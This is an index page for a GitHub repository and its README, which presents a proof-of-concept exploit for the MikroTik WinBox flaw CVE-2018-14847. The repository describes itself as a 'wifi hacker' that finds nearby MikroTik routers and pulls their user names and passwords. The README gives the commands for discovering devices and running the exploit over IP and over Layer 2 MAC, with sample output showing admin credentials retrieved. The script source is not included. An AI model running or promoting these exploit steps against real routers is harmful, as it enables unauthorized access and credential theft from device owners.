Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/johnoseni1/router-hacker-exploit-and-extract-user-and-password-

This is a python wifi (router) hacker , having ability to search for mikrotic devices around you and get their <MAC> address then extract their user and password
https://github.com/johnoseni1/router-hacker-exploit-and-extract-user-and-password-

exploit hacking ipaddress macaddress mikrotik port python safety

Last synced: 3 months ago
JSON representation

This is a python wifi (router) hacker , having ability to search for mikrotic devices around you and get their <MAC> address then extract their user and password

Awesome Lists containing this project

README 

        
# please this was created by John , and shouldn't be used for any opposite intentions



# WinboxExploit

This is a proof of concept of the critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords.



## Requirements

- Python 3+



This script will NOT run with Python 2.x or lower.



## How To Use

The script is simple used with simple arguments in the commandline.



#### WinBox (TCP/IP)

Exploit the vulnerability and read the password.

```

python3 WinboxExploit.py  [PORT]

```

Example:

```

$ python3 WinboxExploit.py 172.17.17.17

Connected to 172.17.17.17:8291



Exploit successful

User: admin

Pass: Th3P4ssWord

```



#### MAC server WinBox (Layer 2)  

You can extract files even if the device doesn't have an IP address.



Simple discovery check for locally connected Mikrotik devices.

```

python3 MACServerDiscover.py

```

Example:

```

$ python3 MACServerDiscover.py

Looking for Mikrotik devices (MAC servers)



    aa:bb:cc:dd:ee:ff 



    aa:bb:cc:dd:ee:aa

```



Exploit the vulnerability and read the password.

```

python3 MACServerExploit.py 

```

Example:

```

$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff



User: admin

Pass: Th3P4ssWord

```